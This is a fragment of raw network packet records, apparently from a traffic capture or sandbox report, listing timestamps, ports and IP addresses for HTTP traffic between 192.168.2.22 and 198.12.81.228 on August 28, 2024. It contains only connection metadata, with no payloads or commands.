                                                                              Aug 28, 2024 22:29:40.382200956 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382204056 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382236004 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382266045 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382276058 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382286072 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382294893 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382306099 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382313013 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382324934 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382487059 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382497072 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382507086 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382518053 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382529020 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382534027 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382540941 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382553101 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382556915 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382565022 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382575989 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382579088 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382586956 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382600069 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382611990 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382628918 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382658958 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382669926 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382818937 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382822990 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382829905 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382839918 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382849932 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382859945 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382870913 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382872105 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382883072 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382894039 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382894993 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382908106 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382919073 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382920980 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382955074 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382955074 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382967949 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382983923 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382993937 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383003950 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383021116 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383043051 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383234978 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383245945 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383255005 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383268118 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383275032 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383280039 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383291006 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383301973 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383311987 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383312941 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383325100 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383335114 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383346081 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383346081 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383357048 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383367062 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383378029 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383379936 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383389950 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383395910 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383491993 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383531094 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383542061 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383550882 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383560896 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383573055 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383579969 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383585930 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383588076 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383598089 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383621931 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383677006 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383693933 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383706093 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383717060 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383727074 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383730888 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383738041 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383749008 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383765936 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383778095 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383898973 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383909941 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383919954 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383929968 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383940935 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383943081 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383949995 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383975029 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.384044886 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384057045 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384068966 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384082079 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384092093 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384107113 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.384109974 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384121895 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.384123087 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384144068 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.384146929 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384160995 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384170055 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384181976 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384182930 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.384192944 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384203911 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384215117 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384224892 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.384402990 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384413958 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384423971 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384433985 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384445906 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384452105 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.384457111 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384471893 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.384496927 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.422538042 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.422549009 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.422557116 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.422590017 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.422960997 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.422971010 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.422981977 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.422992945 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.423002005 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.423017979 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.423028946 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.468215942 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468230009 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468235970 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468302011 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.468512058 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468523979 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468540907 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468550920 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468560934 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468564034 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.468574047 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468584061 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.468591928 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468602896 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468602896 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.468614101 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468625069 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468635082 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468643904 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468652010 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.468661070 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468663931 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.468672037 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468681097 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468692064 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468704939 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468707085 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.468715906 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468727112 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468738079 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468739986 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.468750000 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468760967 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468761921 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.468774080 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468782902 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.468786001 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468802929 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468812943 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468822956 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468823910 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.468848944 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.468904972 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468915939 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468925953 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468943119 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468951941 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.468955040 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468971014 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468982935 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468995094 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.468996048 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469005108 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469022036 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469032049 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469062090 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469073057 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469089031 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469129086 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469204903 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469216108 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469227076 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469247103 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469254017 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469258070 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469269991 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469297886 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469311953 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469324112 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469331980 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469341993 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469355106 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469366074 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469469070 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469480038 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469490051 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469501019 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469511986 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469515085 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469517946 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469530106 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469556093 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469588995 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469599009 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469675064 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469686985 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469696045 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469707012 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469721079 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469746113 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469752073 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469763041 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469772100 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469780922 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469798088 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469808102 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469870090 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469881058 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469892025 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469901085 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469912052 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.469929934 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.469949007 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.470038891 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470057964 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470067978 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470077991 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470088959 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470089912 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.470099926 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470112085 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.470130920 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470140934 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470154047 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470175028 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.470240116 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470251083 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470259905 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470284939 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.470361948 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470371962 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470381975 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470392942 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470402956 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470419884 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470422029 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.470437050 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.470454931 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470464945 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470470905 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470477104 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470506907 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.470581055 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470591068 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470602036 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470613956 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470624924 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470642090 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.470654011 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.470695972 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470706940 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470716953 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470729113 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470737934 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.470757961 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.470768929 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.474039078 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.509458065 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.509468079 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.509480953 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.509521961 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.509597063 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.509608984 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.509618998 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.509629011 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.509639025 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.509644985 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.509669065 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.554963112 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555041075 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555049896 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555061102 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555072069 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555094004 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555094957 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.555104971 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555107117 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.555171013 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.555366993 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555423975 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555475950 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555485964 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555495977 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.555517912 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.555524111 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555535078 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555545092 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555579901 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.555596113 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555608034 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555618048 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555634022 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.555701017 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555711985 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555722952 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555735111 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.555741072 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.555768967 CEST4917280192.168.2.22198.12.81.228
